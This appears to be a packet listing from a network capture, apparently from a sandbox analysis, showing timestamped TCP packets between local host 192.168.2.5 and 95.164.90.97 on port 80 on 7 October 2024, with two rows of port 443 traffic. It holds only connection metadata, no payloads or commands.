Oct 7, 2024 03:15:36.636868000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636883974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636910915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636924982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.636926889 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636955976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.636981964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.636986971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637002945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637021065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637033939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637036085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637059927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637075901 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637075901 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637089968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637105942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637120008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637123108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637140036 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637145042 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637157917 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637175083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637187004 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637331963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637346983 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637367010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637382984 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637406111 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637408018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637408018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637422085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637430906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637439013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637455940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637464046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637471914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.637480974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.637531996 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654000044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654062986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654077053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654115915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654128075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654149055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654166937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654186010 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654198885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654218912 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654237986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654241085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654257059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654273033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654284954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654284954 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654289007 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654305935 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654320002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654333115 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654335976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654354095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.654381037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.654406071 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.705590963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705672026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.705677032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705703974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705723047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705728054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.705739021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705756903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705771923 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.705775976 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705810070 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.705837965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.705866098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705914021 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.705928087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705952883 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705970049 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.705977917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.705986977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.706011057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.706049919 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.706073046 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.706090927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.706136942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.712089062 CEST	49810	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:36.712101936 CEST	443	49810	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:36.725326061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725356102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725373030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725389004 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725404978 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725406885 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.725420952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725439072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725445986 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.725467920 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.725497007 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.725801945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725830078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725847960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725867987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.725891113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.725903034 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725919008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725934029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725958109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725971937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.725972891 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725990057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.725991964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726033926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726051092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726066113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726079941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726095915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726099968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726123095 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726138115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726142883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726152897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726191044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726192951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726210117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726218939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726237059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726247072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726253033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726268053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726270914 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726284027 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726289034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726298094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726317883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726324081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726341009 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726356030 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726357937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726377010 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726383924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726399899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726418018 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726427078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726443052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726455927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726457119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726475000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726479053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726499081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726511002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726514101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726531029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726547003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726548910 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726576090 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726608038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726861954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726913929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.726917028 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.726963043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727041960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727067947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727085114 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727116108 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727132082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727148056 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727152109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727163076 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727186918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727212906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727613926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727670908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727715969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727730989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727756977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727761984 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727772951 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727780104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727790117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727806091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727807999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727823019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727830887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727845907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727861881 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727868080 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727879047 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727890968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727895021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727910995 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727926016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727926970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727942944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727962017 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.727962971 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727989912 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.727991104 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728007078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728008032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728032112 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728043079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728049040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728064060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728065968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728084087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728090048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728106022 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728113890 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728122950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728140116 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728152990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728157043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728169918 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728176117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728197098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728209972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728236914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728246927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728285074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728286028 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728298903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728331089 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728351116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728394032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728409052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728424072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728439093 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728455067 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.728456974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728491068 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.728519917 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.744735956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.744750023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.744771957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.744792938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.744807959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.744818926 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.744823933 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.744839907 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.744856119 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.744864941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.744891882 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.744910955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.745064020 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.745078087 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.745094061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.745110989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.745121002 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.745136023 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.745141029 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.745151043 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.745167971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.745182991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.745208979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.796453953 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.796469927 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.796484947 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.796540976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.796555996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.796571970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.796582937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.796590090 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.796610117 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.796638012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.796648026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.796652079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.796686888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.796730995 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.796998024 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797056913 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.797168970 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797184944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797203064 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797219038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797221899 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.797234058 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797250032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797264099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.797265053 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797281981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.797307968 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.797332048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816472054 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816534996 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816570044 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816581011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816581011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816606045 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816617966 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816633940 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816651106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816653967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816665888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816679001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816694021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816694975 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816708088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816725969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816729069 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816751957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816790104 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816797972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816814899 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816847086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816854954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816867113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816869974 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816886902 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.816895008 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816915989 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816935062 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.816998959 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817012072 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817025900 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817040920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817049026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817055941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817081928 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817099094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817111969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817117929 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817126989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817142963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817148924 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817158937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817177057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817189932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817194939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817214966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:36.817226887 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:36.817240000 CEST	80	49782	95.164.90.97	192.168.2.5
